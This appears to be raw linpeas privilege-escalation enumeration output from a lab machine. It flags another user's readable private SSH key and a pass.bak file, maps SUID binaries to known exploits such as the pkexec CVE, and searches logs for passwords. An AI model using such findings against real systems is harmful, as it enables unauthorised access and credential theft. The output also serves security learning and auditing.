PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
Possible private SSH keys were found!
/home/kay/.ssh/id_rsa
--> /etc/hosts.allow file found, read the rules:
Looking inside /etc/ssh/ssh_config for interesting info
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
GSSAPIDelegateCredentials no
[+] Looking for unexpected auth lines in /etc/pam.d/sshd
No
[+] Looking for Cloud credentials (AWS, Azure, GC)
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/etc/exports Not Found
[+] Looking for kerberos conf files and tickets
[i] https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88#pass-the-ticket-ptt
cat: /etc/krb5.conf: No such file or directory
tickets kerberos Not Found
klist Not Found
[+] Looking for Kibana yaml
kibana.yml Not Found
[+] Looking for Knock configuration
Knock.config Not Found
[+] Looking for logstash files
Not Found
[+] Looking for elasticsearch files
Not Found
[+] Looking for Vault-ssh files
vault-ssh-helper.hcl Not Found
[+] Looking for AD cached hashes
-rw------- 1 root root 430080 Apr 19 2018 /var/lib/samba/private/secrets.tdb
[+] Looking for screen sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
No Sockets found in /var/run/screen/S-jan.
[+] Looking for tmux sessions
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions
tmux Not Found
[+] Looking for Couchdb directory
[+] Looking for redis.conf
[+] Looking for dovecot files
dovecot credentials Not Found
[+] Looking for mosquitto.conf
[+] Looking for neo4j auth file
[+] Looking Cloud-Init conf file
====================================( Interesting Files )=====================================
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/newgrp ---> HP-UX_10.20
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/sudo ---> /sudo$
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/bin/su
/bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
/bin/ping6
/bin/umount ---> BSD/Linux(08-1996)
/bin/fusermount
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/ping
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/lib/snapd/snap-confine
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/chage
/usr/bin/ssh-agent
/usr/bin/expiry
/usr/bin/wall
/usr/bin/screen ---> GNU_Screen_4.5.0
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/mlocate
[+] Writable folders configured in /etc/ld.so.conf.d/
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#etc-ld-so-conf-d
/usr/local/lib
/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu
/usr/lib/x86_64-linux-gnu/mesa
[+] Capabilities
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
[+] Users with capabilities
/etc/security/capability.conf Not Found
[+] .sh files in path
/usr/bin/gettext.sh
[+] Unexpected folders in root
/samba
[+] Files (scripts) in /etc/profile.d/
total 24
drwxr-xr-x 2 root root 4096 Apr 17 2018 .
drwxr-xr-x 99 root root 4096 Nov 15 2018 ..
-rw-r--r-- 1 root root 580 Nov 30 2017 apps-bin-path.sh
-rw-r--r-- 1 root root 663 May 18 2016 bash_completion.sh
-rw-r--r-- 1 root root 1003 Dec 29 2015 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1557 Apr 14 2016 Z97-byobu.sh
[+] Hashes inside passwd file? ........... No
[+] Hashes inside group file? ............ No
[+] Credentials in fstab/mtab? ........... No
[+] Can I read shadow files? ............. No
[+] Can I read root folder? .............. No
[+] Looking for root files in home dirs (limit 20)
/home
/home/jan
/home/jan/.lesshst
/home/kay/.viminfo
/home/kay/.lesshst
[+] Looking for others files in folders owned by me
[+] Readable files belonging to root and readable by me but not world readable
[+] Modified interesting files in the last 5mins
/etc/samba/dhcp.conf
/tmp/linepeas.txt
/tmp/linpeas.sh
/var/log/syslog
/var/log/auth.log
/var/log/kern.log
[+] Writable log files (logrotten)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
[+] Files inside /home/jan (limit 20)
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
[+] Files inside others home (limit 20)
/home/kay/.profile
/home/kay/.viminfo
/home/kay/.bashrc
/home/kay/.bash_history
/home/kay/.lesshst
/home/kay/.ssh/authorized_keys
/home/kay/.ssh/id_rsa
/home/kay/.ssh/id_rsa.pub
/home/kay/.bash_logout
/home/kay/.sudo_as_admin_successful
/home/kay/pass.bak
[+] Looking for installed mail applications
[+] Mails (limit 50)
[+] Backup files?
-rw-r--r-- 1 root root 128 Apr 17 2018 /var/lib/sgml-base/supercatalog.old
-rw-r--r-- 1 root root 610 Apr 17 2018 /etc/xml/catalog.old
-rw-r--r-- 1 root root 673 Apr 17 2018 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 9542 Apr 19 2018 /etc/samba/smb.conf.bak
-rwxr-xr-x 1 root root 10504 Mar 14 2016 /usr/bin/tdbbackup.tdbtools
[+] Looking for tables inside readable .db/.sqlite files (limit 100)
-> Extracting tables from /var/lib/nssdb/cert9.db (limit 20)
-> Extracting tables from /var/lib/nssdb/key4.db (limit 20)
[+] Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K Apr 18 2018 .
drwxr-xr-x 14 root root 4.0K Apr 18 2018 ..
drwxr-xr-x 3 root root 4.0K Apr 23 2018 html
/var/www/html:
total 16K
drwxr-xr-x 3 root root 4.0K Apr 23 2018 .
drwxr-xr-x 3 root root 4.0K Apr 18 2018 ..
[+] Readable *_history, .sudo_as_admin_successful, profile, bashrc, httpd.conf, .plan, .htpasswd, .gitconfig, .git-credentials, .git, .svn, .rhosts, hosts.equiv, Dockerfile, docker-compose.yml
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#read-sensitive-data
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 /home/kay/.bashrc
-rw-r--r-- 1 kay kay 655 Apr 17 2018 /home/kay/.profile
-rw-r--r-- 1 kay kay 0 Apr 17 2018 /home/kay/.sudo_as_admin_successful
-rwxr-xr-x 1 root root 484 Dec 9 2016 /usr/lib/initramfs-tools/etc/dhcp/dhclient-enter-hooks.d/config
-rw-r--r-- 1 root root 3106 Oct 22 2015 /usr/share/base-files/dot.bashrc
-rw-r--r-- 1 root root 3161 Apr 14 2016 /usr/share/byobu/profiles/bashrc
-rw-r--r-- 1 root root 870 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/bash.bashrc
-rw-r--r-- 1 root root 1865 Jul 2 2015 /usr/share/doc/adduser/examples/adduser.local.conf.examples/skel/dot.bashrc
[+] All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 0 Apr 18 2018 /etc/.java/.systemPrefs/.system.lock
-rw-r--r-- 1 root root 0 Apr 18 2018 /etc/.java/.systemPrefs/.systemRootModFile
-rw-r--r-- 1 root root 220 Aug 31 2015 /etc/skel/.bash_logout
-rw------- 1 root root 0 Aug 1 2017 /etc/.pwd.lock
-rw-r--r-- 1 root root 1391 Apr 17 2018 /etc/apparmor.d/cache/.features
-rw-r--r-- 1 root root 0 Apr 30 02:35 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 1319 Apr 17 2018 /var/lib/apparmor/profiles/.apparmor.md5sums
-rw-r--r-- 1 root root 155 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
-rw-r--r-- 1 root root 333 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.ro.cmd
-rw-r--r-- 1 root root 1374 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
-rw-r--r-- 1 root root 1304 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.stack.o.cmd
-rw-r--r-- 1 root root 9092 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.sha256.o.cmd
-rw-r--r-- 1 root root 3615 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.purgatory.o.cmd
-rw-r--r-- 1 root root 1324 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.entry64.o.cmd
-rw-r--r-- 1 root root 3529 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/purgatory/.string.o.cmd
-rw-r--r-- 1 root root 292 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
-rw-r--r-- 1 root root 292 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
-rw-r--r-- 1 root root 402 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
-rw-r--r-- 1 root root 316 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd
-rw-r--r-- 1 root root 320 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd
-rw-r--r-- 1 root root 320 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
-rw-r--r-- 1 root root 315 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
-rw-r--r-- 1 root root 340 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
-rw-r--r-- 1 root root 146 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs.cmd
-rw-r--r-- 1 root root 3342 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_common.o.cmd
-rw-r--r-- 1 root root 3362 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_32.o.cmd
-rw-r--r-- 1 root root 3362 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/tools/.relocs_64.o.cmd
-rw-r--r-- 1 root root 54037 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/arch/x86/kernel/.asm-offsets.s.cmd
-rw-r--r-- 1 root root 22 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.21135.d
-rw-r--r-- 1 root root 3972 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.insert-sys-cert.cmd
-rw-r--r-- 1 root root 2839 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/mdp/.mdp.cmd
-rw-r--r-- 1 root root 3239 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/selinux/genheaders/.genheaders.cmd
-rw-r--r-- 1 root root 1193 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.bin2c.cmd
-rw-r--r-- 1 root root 4268 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/basic/.fixdep.cmd
-rw-r--r-- 1 root root 2391 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.conmakehash.cmd
-rw-r--r-- 1 root root 3253 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.asn1_compiler.cmd
-rw-r--r-- 1 root root 153 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.cmd
-rw-r--r-- 1 root root 2719 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.genksyms.o.cmd
-rw-r--r-- 1 root root 2481 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.parse.tab.o.cmd
-rw-r--r-- 1 root root 3347 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/genksyms/.lex.lex.o.cmd
-rw-r--r-- 1 root root 3387 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.recordmcount.cmd
-rw-r--r-- 1 root root 4495 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.extract-cert.cmd
-rw-r--r-- 1 root root 2380 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.kallsyms.cmd
-rw-r--r-- 1 root root 3485 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.file2alias.o.cmd
-rw-r--r-- 1 root root 104 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.elfconfig.h.cmd
-rw-r--r-- 1 root root 4622 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.o.cmd
-rw-r--r-- 1 root root 4451 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.sumversion.o.cmd
-rw-r--r-- 1 root root 5191 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.s.cmd
-rw-r--r-- 1 root root 2537 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.mk_elfconfig.cmd
-rw-r--r-- 1 root root 546 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.devicetable-offsets.h.cmd
-rw-r--r-- 1 root root 129 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.modpost.cmd
-rw-r--r-- 1 root root 2289 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/mod/.empty.o.cmd
-rw-r--r-- 1 root root 5133 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sign-file.cmd
-rw-r--r-- 1 root root 3755 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.o.cmd
-rw-r--r-- 1 root root 110 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.conf.cmd
-rw-r--r-- 1 root root 4917 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/kconfig/.zconf.tab.o.cmd
-rw-r--r-- 1 root root 3568 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/scripts/.sortextable.cmd
-rw-r--r-- 1 root root 190243 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.config
-rw-r--r-- 1 root root 190367 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.config.old
-rw-r--r-- 1 root root 820 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/.missing-syscalls.d
-rw-r--r-- 1 root root 14210 Jul 18 2017 /usr/src/linux-headers-4.4.0-87-generic/kernel/.bounds.s.cmd
-rw-r--r-- 1 root root 155 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
-rw-r--r-- 1 root root 333 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.ro.cmd
-rw-r--r-- 1 root root 1379 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
-rw-r--r-- 1 root root 1309 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.stack.o.cmd
-rw-r--r-- 1 root root 9148 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.sha256.o.cmd
-rw-r--r-- 1 root root 3615 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.purgatory.o.cmd
-rw-r--r-- 1 root root 1329 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.entry64.o.cmd
-rw-r--r-- 1 root root 3601 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/purgatory/.string.o.cmd
-rw-r--r-- 1 root root 292 Apr 2 2018 /usr/src/linux-headers-4.4.0-119-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
[+] Readable files inside /tmp, /var/tmp, /var/backups(limit 70)
-rw-rw-r-- 1 jan jan 80652 Apr 30 04:24 /tmp/linepeas.txt
-rwxr-xr-x 1 jan jan 213352 Apr 30 04:20 /tmp/linpeas.sh
-rw-r--r-- 1 root root 14659 Apr 23 2018 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 1458 Apr 18 2018 /var/backups/apt.extended_states.1.gz
-rw-r--r-- 1 root root 764 Apr 17 2018 /var/backups/apt.extended_states.2.gz
[+] Interesting writable files owned by me or writable by everyone (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/mqueue/linpeas.txt
/dev/shm
/dev/shm/linpeas.txt
/run/lock
/run/screen/S-jan
/run/user/1001
/run/user/1001/systemd
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linepeas.txt
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/tmux-1001
/tmp/.X11-unix
/tmp/.XIM-unix
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/init.scope/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apparmor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apport.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/console-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-disk-by\x2duuid-db3bdca8\x2d5517\x2d4600\x2db896\x2de8479e05e44a.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-xvda5.swap/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/grub-common.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/[email protected]/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/irqbalance.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/iscsid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd-containers.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/-.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nmbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/run-user-1001.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/samba-ad-dc.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/smbd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/tomcat.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ufw.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/init.scope/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/[email protected]/tasks
/var/spool/samba
/var/tmp
[+] Interesting GROUP writable files (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group jan:
/dev/mqueue/linpeas.txt
/dev/shm/linpeas.txt
/tmp/linepeas.txt
[+] Searching passwords in config PHP files
[+] Finding IPs inside logs (limit 70)
80 /var/log/dpkg.log:1.16.04.1
40 /var/log/dpkg.log:1.16.04.3
25 /var/log/dpkg.log:1.16.04.2
24 /var/log/dpkg.log:1.16.04.4
21 /var/log/dpkg.log:2.16.04.1
20 /var/log/dpkg.log:3.16.04.1
15 /var/log/dpkg.log:3.16.04.3
14 /var/log/wtmp:192.168.56.102
10 /var/log/dpkg.log:6.16.04.1
10 /var/log/apt/history.log:1.16.04.1
9 /var/log/dpkg.log:2.29.4.2
9 /var/log/dpkg.log:2.16.04.2
6 /var/log/apt/history.log:1.16.04.3
4 /var/log/wtmp:192.168.56.101
4 /var/log/installer/status:1.2.3.3
3 /var/log/apt/history.log:2.16.04.1
3 /var/log/apt/history.log:1.16.04.4
3 /var/log/apt/history.log:1.16.04.2
2 /var/log/apt/history.log:3.16.04.1
1 /var/log/wtmp:10.9.35.106
1 /var/log/lastlog:192.168.56.102
1 /var/log/lastlog:10.9.35.106
1 /var/log/installer/status:2.21.63.3
1 /var/log/apt/history.log:6.16.04.1
1 /var/log/apt/history.log:3.16.04.3
1 /var/log/apt/history.log:2.29.4.2
1 /var/log/apt/history.log:2.16.04.2
[+] Finding passwords inside logs (limit 70)
/var/log/bootstrap.log: base-passwd depends on libc6 (>= 2.8); however:
/var/log/bootstrap.log: base-passwd depends on libdebconfclient0 (>= 0.145); however:
/var/log/bootstrap.log:dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
/var/log/bootstrap.log:Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
/var/log/bootstrap.log:Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
/var/log/bootstrap.log:Selecting previously unselected package base-passwd.
/var/log/bootstrap.log:Selecting previously unselected package passwd.
/var/log/bootstrap.log:Setting up base-passwd (3.5.39) ...
/var/log/bootstrap.log:Setting up passwd (1:4.2-3.1ubuntu5) ...
/var/log/bootstrap.log:Shadow passwords are now on.
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) ...
/var/log/bootstrap.log:Unpacking base-passwd (3.5.39) over (3.5.39) ...
/var/log/bootstrap.log:Unpacking passwd (1:4.2-3.1ubuntu5) ...
/var/log/dpkg.log:2017-08-01 11:16:21 configure base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 install base-passwd:amd64 <none> 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:21 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status half-installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:23 upgrade base-passwd:amd64 3.5.39 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:28 install passwd:amd64 <none> 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status half-installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:28 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:31 configure base-passwd:amd64 3.5.39 <none>
/var/log/dpkg.log:2017-08-01 11:16:31 status half-configured base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status installed base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:31 status unpacked base-passwd:amd64 3.5.39
/var/log/dpkg.log:2017-08-01 11:16:37 configure passwd:amd64 1:4.2-3.1ubuntu5 <none>
/var/log/dpkg.log:2017-08-01 11:16:37 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status installed passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:16:37 status unpacked passwd:amd64 1:4.2-3.1ubuntu5
/var/log/dpkg.log:2017-08-01 11:17:35 status half-configured passwd:amd64 1:4.2-3.1ubuntu5
